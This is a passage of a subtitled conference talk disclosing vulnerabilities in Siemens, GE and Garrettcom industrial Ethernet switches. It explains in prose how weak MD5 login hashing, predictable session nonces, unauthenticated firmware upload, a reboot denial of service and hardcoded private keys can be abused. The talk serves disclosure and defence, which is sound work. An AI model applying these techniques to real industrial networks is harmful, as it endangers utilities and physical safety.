< Return to Video

Eireann Leverett: Switches Get Stitches

  • 0:10 - 0:21
    Éireann: Things are blowing up, in
    industrial systems, here in Germany, this
  • 0:21 - 0:26
    year! I had hoped that these things
    wouldn't happen. This kind of future
  • 0:26 - 0:34
    wouldn't be one that we are living in. But
    unfortunately it is. And I hope that we
  • 0:34 - 0:40
    can make that better, partly through the
    course of this talk. But more, I think, in
  • 0:40 - 0:45
    the future with your help and your work.
    So I'm sorry to begin this presentation
  • 0:45 - 0:52
    with such a dark thought but: This year's
    theme is a new dawn. And it's always
  • 0:52 - 0:57
    darkest just before the dawn. So we're
    going to go through some of that darkness
  • 0:57 - 1:04
    in industrial systems and SCADA-systems to
    get to a better place, right? Now with
  • 1:04 - 1:10
    that said no hacker really gets to be
    where they are without the help of other,
  • 1:10 - 1:15
    right? We stand on the shoulders of giants
    and part of the key is not stepping on
  • 1:15 - 1:20
    their toes, on the way up. So I would like
    to say thank you to a bunch of people who
  • 1:20 - 1:25
    are here and also some people who aren't
    here. Particularly the Oslo hackerspace
  • 1:25 - 1:28
    where I hang out. And these people have
    taught me a lot of things not just about
  • 1:28 - 1:34
    technology but about life and on
    "aprendo", which is how Goya signed some
  • 1:34 - 1:40
    of his last paintings and sketches - which
    basically means "I'm still learning". OK.
  • 1:40 - 1:46
    So with that said I hope that you will
    enjoy this talk with its darkness and its
  • 1:46 - 1:50
    humor all at the same time. I used to be
    in circus, as you may have guessed from
  • 1:50 - 1:56
    the mustache. So I encourage you not just
    to view this as a technical vulnerability
  • 1:56 - 2:02
    presentation but also as kind of live
    technical standup comedy. Instead of jokes
  • 2:02 - 2:07
    we have vulnerabilities. And I hope that
    you will enjoy them. So these
  • 2:07 - 2:13
    vulnerabilities are in switches. I chose
    to focus on switches and that will become
  • 2:13 - 2:19
    clear throughout the presentation, why I
    chose to do that for industrial systems.
  • 2:19 - 2:24
    And we are looking primarily at three
    different families of switches. Because I
  • 2:24 - 2:28
    don't want to pick on any one vendor. In
    fact, the whole idea of this talk is to
  • 2:28 - 2:32
    continue giving it. I have two other
    colleagues who couldn't be here with me
  • 2:32 - 2:36
    today, who have some vulnerabilities in
    some other switches. And they look forward
  • 2:36 - 2:40
    to presenting those vulnerabilities as
    part of this presentation in the future.
  • 2:40 - 2:43
    So every time we give this presentation
    we'd like to give some new vulnerabilities
  • 2:43 - 2:50
    and show that this is systemic and endemic
    risk. So the three switches we'll be
  • 2:50 - 2:54
    looking at today are the Siemens Scalance-
    family, the GE Multilin-family and the
  • 2:54 - 2:59
    Garrettcom Magnum family. These switches
    are usually not very big. They might be 8
  • 2:59 - 3:06
    ports, they might be 24 ports. And they're
    used in a variety of different locations.
  • 3:06 - 3:13
    So this talk is for you, if you work in a
    utility, if you test industrial Ethernet
  • 3:13 - 3:17
    switches, if you manage industrial
    Ethernet networking, if you're comfortable
  • 3:17 - 3:22
    at a Linux commandline and you play with
    web apps but you don't know as much about
  • 3:22 - 3:25
    reverse engineering. Don't worry, I'm
    exactly the same. I suck at reverse
  • 3:25 - 3:32
    engineering. But I care about this stuff.
    And so I'm learning. If you are a
  • 3:32 - 3:36
    developer of firmware then I think this
    talk is for you as well. I hope you learn
  • 3:36 - 3:40
    something from it. If you like
    vulnerabilities you'll enjoy this quite a
  • 3:40 - 3:45
    lot. I'm going to be sharing with you a
    little collection I have, you know. Some
  • 3:45 - 3:52
    people collect stamps or stories or jokes.
    I collect private keys. And I like to
  • 3:52 - 3:58
    share them with other enthusiasts such as
    yourself. If you happen to work for one of
  • 3:58 - 4:01
    the switch manufacturers you know I've
    spoken to before. Some of you I get on
  • 4:01 - 4:07
    with very well. We speak regularly. Some
    of you not yet - but I hope you'll come
  • 4:07 - 4:13
    and have a chat with me later. Ok, most
    SCADA or ICS presentations go a bit like
  • 4:13 - 4:21
    this: Pwn PLC, the RTU, the HMI - these
    are terms, you know, that all of us in
  • 4:21 - 4:24
    SCADA know. Maybe most of you know them by
    now, they're pretty popular. I hope you
  • 4:24 - 4:28
    do. But programmable logic controller,
    remote terminal unit or human machine
  • 4:28 - 4:33
    interface. And the basic idea of the
    presentation is if I pwn these things,
  • 4:33 - 4:38
    game over. Physical damage. I win. Isn't
    the world a scary place? And I encourage
  • 4:38 - 4:42
    you to demand better content. I certainly
    grew up with better content. I used to go
  • 4:42 - 4:46
    and see the presentations and the talks of
    a guy called Jason Larson. And he has a
  • 4:46 - 4:50
    fantastic example of this. I want all of
    you to try it, right now. Just think
  • 4:50 - 4:56
    about: If you had complete control over a
    paint factory. What would you do to damage
  • 4:56 - 4:59
    it? No one is going to get hurt.
    Everything's safe. It's a thought
  • 4:59 - 5:06
    experiment, right? What would you do to
    damage it? Most people can't answer this
  • 5:06 - 5:10
    question. And on certain types of
    processes I can't answer this question.
  • 5:10 - 5:13
    But other types I've worked with before
    and I can answer this question. And I
  • 5:13 - 5:18
    encourage you to to ask it. But if you
    like and you want to learn more go and see
  • 5:18 - 5:24
    Marmusha's talk - I think it's tomorrow.
    Think of my talk as a frame for her talk.
  • 5:24 - 5:28
    She's going to be talking about how to
    damage a chemical process. And what you
  • 5:28 - 5:32
    need to do as an engineer to do that. And
    the reason she's doing that is to build a
  • 5:32 - 5:36
    better process in the future. You have to
    break a few things to make them work a
  • 5:36 - 5:41
    little bit better. Okay. So what's the
    point in industrial control systems
  • 5:41 - 5:48
    security? It's not credit card data. It's
    not privacy. No disrespect to my privacy
  • 5:48 - 5:52
    friends in the room. I have the deepest
    love and respect for the work that you do.
  • 5:52 - 5:58
    But confidentially ... confidentiality is
    the lowest priority for us in industrial
  • 5:58 - 6:05
    systems. It would go: Availability,
    integrity, confidentiality. And you might
  • 6:05 - 6:11
    even swap integrity and availability in
    many cases. So, you have to protect the
  • 6:11 - 6:17
    sensor data or the control signals.
    Everything else is maybe a vulnerability
  • 6:17 - 6:20
    on the path to getting this. But it's not
    the most important thing that we're trying
  • 6:20 - 6:26
    to protect. So that's why I'm attacking
    switches. That's where the process is,
  • 6:26 - 6:33
    right? Now these may not be core switches.
    They're often a little bit further down in
  • 6:33 - 6:37
    the chain. They're field devices, right.
    So you might find them in any of these
  • 6:37 - 6:45
    locations. And this last example is not
    necessarily important be cause oil and gas
  • 6:45 - 6:49
    is important - but it's important because
    it gives you the general format of all
  • 6:49 - 6:53
    industrial systems. You have sensor
    network. And sensor data is traveling back
  • 6:53 - 6:59
    and forth. And you have control signal
    data. That's it, basically. You might have
  • 6:59 - 7:01
    different control signals on different
    protocols and you might have different
  • 7:01 - 7:05
    sensors on different protocols, giving you
    different values like pressure or heat or
  • 7:05 - 7:16
    whatever. But most processes follow
    basically this format. Okay. I don't do
  • 7:16 - 7:20
    SCADA 101. There are other people who do
    this. I'm trying to do a little bit, to
  • 7:20 - 7:26
    set the reference for this talk, but
    usually I avoid it. So basically there's
  • 7:26 - 7:31
    not much authentication or integrity in
    industrial systems protocols. There's not
  • 7:31 - 7:36
    much cryptography. You would expect there
    to be, maybe. I'm continually surprised
  • 7:36 - 7:40
    that I don't find any. And when I do find
    it, it's badly implemented and barely
  • 7:40 - 7:48
    works. So once you have compromised a
    switch or another part of the network you
  • 7:48 - 7:52
    can perform man-in-the-middle attacks on
    the process. Or you can create malicious
  • 7:52 - 7:56
    firmwares on these different switches. And
    that's what I'm trying to prevent. I'm
  • 7:56 - 8:00
    trying to find some of the different
    methods that people can use to produce
  • 8:00 - 8:10
    these firmwares - and then get the vendors
    to fix them, right. Okay. These are some
  • 8:10 - 8:14
    of the protocols. If you are new to this
    space, if you want to do some more work in
  • 8:14 - 8:18
    this area, but you don't know what to work
    on, take a picture of the slide or go and
  • 8:18 - 8:21
    find it later. And choose one of these
    protocols and go and work on it. We need
  • 8:21 - 8:24
    people to go to these different
    organizations. Some of them are
  • 8:24 - 8:27
    proprietary, some of them are open and
    complain that there is not enough
  • 8:27 - 8:32
    cryptography going on in this space. And
    yes you can use VPNs. But believe me, I
  • 8:32 - 8:44
    often don't find them. Okay. These are the
    switches, the specific versions of the
  • 8:44 - 8:47
    firmware, in case you're here for
    vulnerabilities instead of just me
  • 8:47 - 8:52
    waffling on about the basics. If you want
    to go and look these up, if you're a
  • 8:52 - 8:58
    penetration tester working in this space,
    you can go and find them all online. And
  • 8:58 - 9:02
    you can get a feeling for the kind of
    coding practices that go into these
  • 9:02 - 9:07
    different devices. Now I've tried to
    choose the vulnerabilities that I'm
  • 9:07 - 9:15
    presenting very carefully. To take you
    gently from web app vulnerabilities into a
  • 9:15 - 9:20
    little bit deeper into the firmware. So
    the first one we'll be looking at is
  • 9:20 - 9:25
    Siemens. And again, I'm not picking on any
    particular vendor. In fact I'm very proud
  • 9:25 - 9:30
    of Siemens. They're probably here again.
    They're here many years. And they fixed
  • 9:30 - 9:35
    these vulnerabilities within three months.
    And I think that was awesome - especially
  • 9:35 - 9:42
    in the space that I work in. The average
    patch-time in SCADA and ICS is 18 months.
  • 9:42 - 9:46
    So I think Siemens deserves a round of
    applause for getting these fixed.
  • 9:46 - 9:53
    Applaus
    So without further ado let's have some
  • 9:53 - 9:59
    fun, right. So MD5, you go to the web page
    for this switch. This is the management
  • 9:59 - 10:03
    page of a switch, right. And you interact
    with this webpage. And you have a look at
  • 10:03 - 10:13
    it. And on the client side they do MD5 of
    the password. Okay. That's fascinating. I
  • 10:13 - 10:17
    don't think that's particularly secure.
    But it's done in roughly the same format
  • 10:17 - 10:21
    as that Linux command. So I use the Linux
    command instead of the JavaScript just to
  • 10:21 - 10:26
    make it easier for everyone. You have the
    username at the beginning and the password
  • 10:26 - 10:30
    is in the middle. And then you have this
    nonce that's at the end, a number you use
  • 10:30 - 10:34
    once, right. I was surprised to see the
    nonce, and it's even called a nonce,
  • 10:34 - 10:37
    right. So somebody had done a little bit
    of homework on their cryptography. And
  • 10:37 - 10:41
    they understood that they wanted to use,
    you know, this number used once to prevent
  • 10:41 - 10:45
    replay of the hash every time. Okay,
    that's some pretty good work.
  • 10:45 - 10:49
    Unfortunately this is MD5 and this is
    protecting your electric utilities and
  • 10:49 - 10:56
    your water and your sewage systems. And
    you can brute force this in a few seconds,
  • 10:56 - 11:00
    if the passwords are less than eight
    characters. and if they're around 15 it
  • 11:00 - 11:04
    might take you 20 minutes or something.
    You can do this from PCAPs, from network
  • 11:04 - 11:08
    traffic captures. And then you have the
    cleartext password that you can use
  • 11:08 - 11:16
    forever after, with that switch. So, off
    to a bad start, in my opinion. So these
  • 11:16 - 11:23
    are the nonces that we're looking at. I'm
    glad to hear you laughing. It makes me, it
  • 11:23 - 11:27
    warms the heart, right. So you can see
    that they are incrementing and that they
  • 11:27 - 11:38
    are hex. Yeah. What else can you say about
    this? The last half is different than the
  • 11:38 - 11:46
    first half. Not only is it incrementing,
    it is sequential. If you pull them quickly
  • 11:46 - 11:53
    enough. For those of you who also do a bit
    of reverse engineering you might recognize
  • 11:53 - 11:58
    the first half as well. Anybody in the
    room see any patterns in the first half of
  • 11:58 - 12:10
    the of the nonces? No? Hmm? Very good, IP
    address. Mac address would have been a
  • 12:10 - 12:14
    good guess as well. I thought it was at
    first. And I got very confused when I went
  • 12:14 - 12:17
    to look for the IP address. Because I went
    to the switch itself. And the switches IP
  • 12:17 - 12:25
    address was not this in hex. It's the
    clientside address. Which I just couldn't
  • 12:25 - 12:29
    believe, right? Like, it seems like it
    makes a sort of sense if you're trying to
  • 12:29 - 12:34
    keep session IDs in state. And it's like
    oh I want a different session for every IP
  • 12:34 - 12:39
    address. And then I'll just use time, I
    use uptime in hex as the rest of my
  • 12:39 - 12:45
    session ID, right? You know, the entire IP
    space and time that can't be brute force.
  • 12:45 - 12:52
    It has a kind of crazy logic to it, right.
    Unfortunately it can be. And you can get
  • 12:52 - 12:57
    the uptime from the device using SNMP. And
    of course if you don't want to use SNMP
  • 12:57 - 13:04
    you can get old-school and use the TCP-
    sequence-ID numbers. So, not a lot of
  • 13:04 - 13:10
    entropy there, I guess, I would say. And I
    think their lawyers agreed when they put
  • 13:10 - 13:18
    out the comments on this. All right. Not
    only can you perform session hijacking.
  • 13:18 - 13:21
    And if you are attacking switches I'd like
    to point out that session hijacking is not
  • 13:21 - 13:25
    necessarily a great attack in this
    environment. Think about it like you would
  • 13:25 - 13:30
    at home, right. How often do you log into
    your router? In fact even more importantly
  • 13:30 - 13:33
    how often do you upgrade the firmware on
    your router? Everyone who has upgraded the
  • 13:33 - 13:38
    firmware on their router ever raise your
    hand. Just for an experiment. Thank
  • 13:38 - 13:42
    goodness, right. But wait, keep them up
    just for a minute. Everybody who's updated
  • 13:42 - 13:46
    it this year, keep your hand up. Everybody
    else put them down. Everybody who has
  • 13:46 - 13:50
    updated in the last six months ... okay
    ... So that gives you a sense of how long
  • 13:50 - 13:55
    these vulnerabilities can be in play on an
    industrial system's environment. If you
  • 13:55 - 14:02
    multiply that by about 10, right. Okay, so
    you can simply upload a firmware image to
  • 14:02 - 14:06
    a Siemens Scalance device with this
    version number without authentication. You
  • 14:06 - 14:16
    just need to know the URL. Cross-site
    request forgery, right. I just say CSRF
  • 14:16 - 14:20
    all the time. I don't even remember what
    it stands for. So you can upload or you
  • 14:20 - 14:23
    can download a logfile. Not that useful
    but you get a sense of what's going on on
  • 14:23 - 14:27
    the switch. You know what usernames might
    be present, whatever. Incidentally all of
  • 14:27 - 14:32
    these switches by default or at least this
    one only have two usernames, right. So
  • 14:32 - 14:37
    it's "admin" and "operator" I think on
    this switch. Or maybe it's not. But
  • 14:37 - 14:43
    anyway, there's two usernames "admin" and
    "manager"? I know I get them mixed up now.
  • 14:43 - 14:47
    But the configuration includes password
    hashes. I'm actually not even entirely
  • 14:47 - 14:51
    convinced they're hashes because when you
    increase the length of your password it
  • 14:51 - 14:56
    increases. But I'll leave that for future
    researchers to examine. You can download
  • 14:56 - 14:59
    the firmware image from the device, which
    is nice. So you just make a request. You
  • 14:59 - 15:03
    just post an HTTP-request to this device.
    And it gives you the firmware that it is
  • 15:03 - 15:08
    running back. That's not that big a deal,
    right. Because you're just viewing data on
  • 15:08 - 15:15
    the switch. But you can upload firmware
    and configuration to this device. Which is
  • 15:15 - 15:19
    an authentication bypass in and of itself.
    But it's also interesting because I can
  • 15:19 - 15:22
    take a configuration file from one of the
    devices that I have at home with a known
  • 15:22 - 15:27
    password. I can upload a new configuration
    file with a password that I know. I can
  • 15:27 - 15:32
    use the device to do whatever I want to
    do. And later I can re upload the old
  • 15:32 - 15:36
    configuration file that I got from the
    device, so no one ever even realizes what's
  • 15:36 - 15:46
    been changed, right. So. I think that's a
    disappointing state of affairs. And I
  • 15:46 - 15:49
    wrote a script to do this. So that you
    wouldn't have to when you are doing
  • 15:49 - 15:54
    penetration tests of these device. And I
    gave you a little ASCII menu because
  • 15:54 - 15:58
    sometimes I get bored. Cambridge is a
    small town and there's not much to do in
  • 15:58 - 16:06
    the evening. So feel free to go and
    examine my github-repository where I put
  • 16:06 - 16:12
    up some of this stuff. I'm Blackswanburst
    on Github, and on Twitter. So like I say,
  • 16:12 - 16:15
    Siemens are some of my favorite people. So
    I'm going to finish up with them. This is
  • 16:15 - 16:20
    old day, if you like all that you have
    just seen. But I want you to keep in mind
  • 16:20 - 16:24
    that these vulnerabilities will still be
    present in the wild for another two or
  • 16:24 - 16:29
    three years. And I encourage you to go and
    have a look at your systems, if you have
  • 16:29 - 16:34
    any of these devices. And check them out.
    And upgrade the firmware. I also hope this
  • 16:34 - 16:39
    encourages you that if you haven't done
    much in industrial systems and SCADA you
  • 16:39 - 16:42
    don't have to be intimidated by all of the
    engineering and the terminology, and the
  • 16:42 - 16:47
    verb beotch(?).. There is plenty for any
    of you in this room to do in the
  • 16:47 - 16:52
    industrial systems space. You need to
    spend a little time speaking to engineers
  • 16:52 - 16:57
    and translating your vulnerabilities into
    something meaningful for them. But that's
  • 16:57 - 17:00
    just a matter of spending more time with
    them and getting to know them. And I think
  • 17:00 - 17:04
    that's valuable too because they have a
    lot of experience. They care very deeply
  • 17:04 - 17:08
    about safety. And I've learned quite a lot
    of things from engineers. My general point
  • 17:08 - 17:14
    here is I'd like you to stop defending
    banks and websites and other stuff. We
  • 17:14 - 17:18
    need your help in industrial systems, in
    the utilities. We could really do with
  • 17:18 - 17:22
    living in a safer world rather than one
    where you're just protecting other
  • 17:22 - 17:32
    people's money. So we're gonna move on to
    the GE Multilin line. I worked on a GE
  • 17:32 - 17:39
    ML800 but these vulnerabilities affect
    seven of the nine switches in this family.
  • 17:39 - 17:43
    Seven because one of the other switches is
    an unmanaged switch. If you're a hardware
  • 17:43 - 17:48
    person maybe you want to go and play
    around with those but not so much my thing
  • 17:48 - 17:51
    and the other one uses a different
    firmware image but seven of the nine
  • 17:51 - 17:58
    switches use a similar firmware image GE
    offers a worldwide 10 year warranty. So
  • 17:58 - 18:02
    let's see if that includes fixing
    vulnerabilities. I think it should. What
  • 18:02 - 18:11
    do you think. No? Couple noes couple of
    yeses, undecided. All right. CCC is
  • 18:11 - 18:18
    undecided on something that's novel. Let's
    start with some new vulnerabilities. Cross
  • 18:18 - 18:23
    site scripting. Reflected, I grant you but
    still cross site scripting and I want you
  • 18:23 - 18:26
    to pay attention to the details. I'm not
    going to go slow for you and ask you to
  • 18:26 - 18:29
    think . I know it's morning, I know it's
    tough but I am going to ask you to think.
  • 18:29 - 18:37
    See flash up there flash.php and the third
    one. Yes, it runs flash in your browser.
  • 18:37 - 18:42
    So if you know something about Flash come
    and have a look at the switch some time. I
  • 18:42 - 18:48
    didn't go for active script attacks. There are
    so many attacks surface on this device. I
  • 18:48 - 18:52
    just I sometimes don't even know how I'm
    going to finish looking at all of them. So
  • 18:52 - 18:56
    I just work with the web interface to
    begin with. So you have this cross site
  • 18:56 - 19:01
    scripting times eight and I want you to
    notice in the last section there
  • 19:01 - 19:06
    arbitrarily supplied URL parameters. I
    don't know about you but I think that's
  • 19:06 - 19:10
    funny right. You can just make up
    parameters to stick your cross site
  • 19:10 - 19:20
    scripting in. laughs It's unbelievable
    right. Yeah. Anyways what does that look
  • 19:20 - 19:28
    like. It looks like that, they have an
    error data page. OK maybe I'm using a
  • 19:28 - 19:33
    browser that they don't approve or
    something but it deserves looking at. And
  • 19:33 - 19:39
    you can do quite a lot of things with
    javascript on the client side these days.
  • 19:39 - 19:44
    Disturbing. Anyways I'm not a big fan of
    XSS so I'm going to move on to things that
  • 19:44 - 19:53
    I think are worth my time. So if you fetch
    the initial web page of this switch before
  • 19:53 - 20:01
    you've even logged in you get this config.
    So this is pretty authentication. No
  • 20:01 - 20:07
    authentication, right. Now keep in mind that
    these switches are designed for process
  • 20:07 - 20:15
    data, right. It's not carrying traffic to
    images of cats. It's supposed to be for
  • 20:15 - 20:23
    engineering. So what happens if I add a
    nocache parameter and I make it say 500000
  • 20:23 - 20:30
    digits long. I should just be able to
    crash the web server. Right. Maybe maybe.
  • 20:30 - 20:41
    But you would not expect it to reboot the
    switch. And it takes a minute or so for
  • 20:41 - 20:45
    the switch to reboot which is actually
    really impressive comes up pretty quickly.
  • 20:45 - 20:51
    But you know obviously you can repeat
    this. So I wanted to examine that a lot
  • 20:51 - 20:56
    further. I wanted to know more about that
    that crash what was rebooting the switch.
  • 20:56 - 20:59
    But like I say I'm not a very good reverse
    engineer. So you're going to go on a
  • 20:59 - 21:03
    little journey with me where I learned a
    couple of things about reverse engineering
  • 21:03 - 21:06
    and I had to change my approach from
    looking at the webapp style loans to
  • 21:06 - 21:12
    moving into this other stuff. So why is
    why is it DoS even interesting. You'll
  • 21:12 - 21:18
    remember that I mentioned Misha's talk. So
    the reason I mention her talk, this is it
  • 21:18 - 21:24
    right. Denial of Service on a Website. Who
    cares it's tearing posters down as xkcd
  • 21:24 - 21:29
    once famously explained to us but in the
    industrial system's environment it's very
  • 21:29 - 21:34
    different. It can be very serious right. A
    simplistic example is you have an
  • 21:34 - 21:39
    application that has a heartbeat and if
    you stop that heartbeat it might go into
  • 21:39 - 21:44
    some sort of safety state it might for
    example scram a reactor. There is a famous
  • 21:44 - 21:51
    denial of service on PLCs that did scram a
    reactor in real life. Does anybody know
  • 21:51 - 21:59
    what H2S is? Any oil and gas engineers in
    the room? Okay so H2S alerts not reaching
  • 21:59 - 22:03
    their destinations is pretty serious
    business right. For those of you who are
  • 22:03 - 22:08
    not aware of H2S it's a byproduct of
    producing oil and gas and inhaled in very
  • 22:08 - 22:13
    very small amounts you can go unconscious
    and in sort of larger amounts. Respiratory
  • 22:13 - 22:18
    failure. So if you take CA safety
    seriously if you ever work on these rigs
  • 22:18 - 22:23
    in these environments you learn to care
    about the wind sock. Right one of these
  • 22:23 - 22:27
    alerts goes out. An alarm goes off. There
    are many different alarms you have to
  • 22:27 - 22:31
    memorize how they all sound on a rig and
    then react to them and when you hear the
  • 22:31 - 22:35
    H2S alert you look up at the wind sock to
    keep an eye on where the wind is and
  • 22:35 - 22:40
    trying to avoid being downwind of wherever
    the leak is. So a simple denial of service
  • 22:40 - 22:44
    that we would not care about in a web
    application environment in this
  • 22:44 - 22:48
    environment can be very serious. I'm not
    saying it always is. It just can be
  • 22:48 - 22:53
    right. So denial of service goes up in our
    list of problems especially when we're
  • 22:53 - 22:58
    looking at networking devices. Okay so
    that's that's it for the denial of
  • 22:58 - 23:02
    service. But like I say we're going to
    look at some other stuff. In fact the
  • 23:02 - 23:07
    story with the switch began with a
    concerned citizen about three or four
  • 23:07 - 23:12
    years ago I found 10000 industrial systems
    on the Internet as part of my master's
  • 23:12 - 23:18
    thesis and I was pretty uncomfortable with
    that. So I sent that data to various
  • 23:18 - 23:24
    computer emergency response teams around
    the world. I believe it was 52 of them
  • 23:24 - 23:27
    right. Not all of them were critical
    infrastructure. A lot of them were small
  • 23:27 - 23:31
    stuff but maybe 1 in 100. I was told or in
    one particular country when they got back
  • 23:31 - 23:38
    to me one in 20 were considered critical
    infrastructure. And after that you have a
  • 23:38 - 23:43
    sort of reputation among the computer
    emergency response teams of the world. So
  • 23:43 - 23:48
    people send you stuff you get anonymous
    e-mails from someone called Concerned
  • 23:48 - 23:53
    Citizen. Thank you very much. They sent me
    a firmware upgrade pcap of this particular
  • 23:53 - 23:57
    device. I suspect that they worked at one
    of the utilities and they wanted me to see
  • 23:57 - 24:06
    how upgrading the firmware of this GE switch
    was performed. So it all began with a pcap.
  • 24:06 - 24:11
    So I ran TCP trace to carve out all the
    files and see what was going on and you
  • 24:11 - 24:17
    could see instantly that there was an FTP
    session later looking at the switch I see
  • 24:17 - 24:21
    that you can also upgrade them over TFTP
    so the management of the switch happens in
  • 24:21 - 24:27
    HTTPs and is encrypted but the firmware
    upload goes across FTP right so you can
  • 24:27 - 24:34
    just carve the file out a little bit of
    network forensics I guess. So instantly I
  • 24:34 - 24:37
    could see that this one is complete and
    the ports on the end of the numbers give
  • 24:37 - 24:41
    me a clue of what's going on in the larger
    stream. This one seems interesting. Let's
  • 24:41 - 24:48
    have a look at it. So. I tried running
    file and binwalk I don't know about you
  • 24:48 - 24:53
    but I believe that hacking is a journey of
    understanding and facts hacking is
  • 24:53 - 24:58
    understanding a system better than it
    understands itself and nudging it to do
  • 24:58 - 25:04
    what you want right. And I also feel that
    I should understand my tools. I don't
  • 25:04 - 25:07
    really understand my tools until I know
    where they're going to fail me or they
  • 25:07 - 25:11
    have failed me in the past and in this
    particular case I think binwalk is a
  • 25:11 - 25:15
    fantastic tool and file is a fantastic
    tool. But they didn't tell me anything and
  • 25:15 - 25:19
    that was that was a journey of discovery
    for me. So that was nice. It was like OK
  • 25:19 - 25:22
    binwalk doesn't always give me everything.
    I think I was running an older version and
  • 25:22 - 25:25
    I think it would handle it now. But the
    point is after been walked didn't give me
  • 25:25 - 25:30
    anything just resort to the old school
    stuff right. Go strings and I found these
  • 25:30 - 25:34
    deflate and inflate copywrite strings and
    I could tell that a certain portion of the
  • 25:34 - 25:44
    file was compressed. This is just from the
    pcap. Remember this whole story. So I
  • 25:44 - 25:49
    tried to deflate the whole thing. That
    didn't work again. I just did something
  • 25:49 - 25:55
    simple get a python script that checks
    every byte to see which parts of the file
  • 25:55 - 26:01
    don't produce ZLIB errors when you try and
    decompress them and you figure out what
  • 26:01 - 26:09
    sectors of this file are compressed. So
    you go to your friend dd and you carve out
  • 26:09 - 26:16
    this section of the file right. So we have
    this larger firmware image with this
  • 26:16 - 26:21
    little compressed section and we have now
    cut this little compressed section out. I
  • 26:21 - 26:24
    suppose I could have loaded this up into
    python and use ZLIB to decompress it. But
  • 26:24 - 26:28
    at the time I was still trying to use
    command line tools and someone said I'll
  • 26:28 - 26:35
    just concatenate the gzip bytes on it.
    Gzip inherits from inflate and deflate. So
  • 26:35 - 26:39
    if you just concatenate the bytes it
    should still handle it. So I did that and
  • 26:39 - 26:44
    I got a decompressed binary. When you ran
    strings on that it started to make a lot
  • 26:44 - 26:49
    more sense and you could find the opcodes
    in it where previously it didn't make any
  • 26:49 - 26:54
    sense at all. So once you've got an image
    like that what do you do. Well if you're
  • 26:54 - 26:58
    me you just grep for bugs. I think I
    learned that from Ilija. If he's here in
  • 26:58 - 27:06
    the room thank you. Thank you very much. I
    asked him like a year or two ago. How do
  • 27:06 - 27:11
    you how do you find so many bugs. And he
    said: "Oh, I just, you know, I grep for
  • 27:11 - 27:17
    them, I use find." laughs And so I
    started thinking about firmware images.
  • 27:17 - 27:20
    Like if I was going to grep for a bug in a
    firmware image what would it be. And my
  • 27:20 - 27:24
    answer is hardcoded credentials and
    default keys because you find them every
  • 27:24 - 27:29
    single time so I have this command aliased
    on my machine and I just grep for it and I
  • 27:29 - 27:35
    find private keys and this is how you too
    can end up with a private key collection.
  • 27:35 - 27:40
    So, there you go.
  • 27:40 - 27:50
    Applause
  • 27:50 - 27:54
    Yeah they're hardcoded keys,
    but what are they for. It doesn't
  • 27:54 - 27:58
    stop there. You know you've got the keys,
    but what do they do, right? That was the
  • 27:58 - 28:02
    next step of the journey for me. Two of
    them you can see one sencrypted with a
  • 28:02 - 28:06
    password; we'll come back to that one
    later. Let's start with the one on the
  • 28:06 - 28:16
    left. If you load this key up into
    wireshark. and you use it to decrypt the
  • 28:16 - 28:23
    SSL you have a self decrypting pcap.
    Remember at the beginning it was using
  • 28:23 - 28:30
    HTTPS to manage the device and upload this
    firmware image. So if you happen to have
  • 28:30 - 28:37
    this firmware image you can decrypt all
    the traffic. No forward secrecy, right?
  • 28:37 - 28:42
    Now you don't have to be lucky and have
    concerned citizens send you an email. You
  • 28:42 - 28:46
    can download this image from the GE website
    and you can carve the keys out of the
  • 28:46 - 28:50
    image in the same way that I did and
    decrypt the SSL traffic of any pcap that
  • 28:50 - 29:02
    is sent to you. Now the passwords
    underneath that are in clear text. You can
  • 29:02 - 29:08
    see them highlighted down here. Password
    Manager and user manager. You can see them
  • 29:08 - 29:13
    up there as well and you can see that
    we've decrypted the SSL with that key. So
  • 29:13 - 29:17
    default keys, right? Is it a big deal? I
    believe the vendors in this case say you
  • 29:17 - 29:21
    can upload your own key to the device. For
    those of you who aren't used to working in
  • 29:21 - 29:24
    embedded it sometimes is difficult to
    generate a key on the device because you
  • 29:24 - 29:28
    don't have enough memory or you don't have
    enough entropy or you don't have enough
  • 29:28 - 29:32
    processing power. That's the usual
    excuses. And they're true I shouldn't say
  • 29:32 - 29:36
    excuses those those things are true. But
    you could of course generate it on the
  • 29:36 - 29:40
    client side and upload it to the device
    and that's what they allow you to do with
  • 29:40 - 29:45
    this switch which is great but where is
    your encrypted channel in which to upload
  • 29:45 - 29:53
    this key? laughs So you can use the serial
    device and make sure visually that there's no man
  • 29:53 - 29:55
    in the middle. But if you're doing this
    remotely – and I'd like you to keep in
  • 29:55 - 29:59
    mind that most substations are remote –
    if anyone here works in a utility are you
  • 29:59 - 30:04
    going to drive to every substation, plug
    in a serial cable to change the keys on
  • 30:04 - 30:08
    all these devices? It's the sort of thing
    you need to know in advance right? So the
  • 30:08 - 30:12
    problem with key management, particularly
    with SSL and the industrial systems
  • 30:12 - 30:19
    environment, is that you have to manage
    the keys. And these particular keys, well
  • 30:19 - 30:24
    the certificates are self signed so you
    can't revoke them. And besides industrial
  • 30:24 - 30:27
    systems are never connected to the
    Internet. So it wouldn't have made any
  • 30:27 - 30:32
    difference. So these are the kind of
    problems we're dealing with in this space.
  • 30:32 - 30:35
    And that's why I'm trying to encourage
    you. Whether you do crypto or privacy or
  • 30:35 - 30:38
    whatever spend a little time in the
    embedded space, just for bit: there's
  • 30:38 - 30:46
    plenty of easy work. OK. So what about the
    second key. It requires a password. I
  • 30:46 - 30:51
    didn't feel like brute forcing it. Maybe
    you do. I don't know. I tried all the
  • 30:51 - 30:54
    strings in the image. A classic technique,
    just in case someone had a hard coded the
  • 30:54 - 30:57
    password. I mean the hard coded
    credentials were there but not the hard
  • 30:57 - 31:00
    coded password. So I guess I gotta start
    reversing, and as I previously said I suck
  • 31:00 - 31:06
    at reversing. That's why I come to CCC, so
    I can learn, right? But I did find this
  • 31:06 - 31:12
    PowerPC ROM image. and I think its running
    eCos and redboot and I haven't even gotten
  • 31:12 - 31:15
    down to doing hardware stuff: taking it
    apart, having look at, it but I probably
  • 31:15 - 31:19
    will in the future. So there's the image
    I'm slowly starting to learn my way around
  • 31:19 - 31:27
    and figure out what's going on. So I had a
    look at the image and I figured out that
  • 31:27 - 31:32
    this key is used for SSH, right? Well it
    would be the other encrypted thing. But I
  • 31:32 - 31:36
    couldn't enable SSH on the device. I try
    and enable SSH on the device and I'm
  • 31:36 - 31:39
    logged in as manager by the way. which is
    highest level user on this particular
  • 31:39 - 31:44
    device, and I put it in the passwords that
    I know and a bunch of other passwords and
  • 31:44 - 31:48
    they don't work. Like I said, I tried all
    the strings in the image. So apparently to
  • 31:48 - 31:52
    enable ssh, I need a password for
    something. Now maybe I'm just
  • 31:52 - 31:56
    misunderstanding or I'm not so clear on
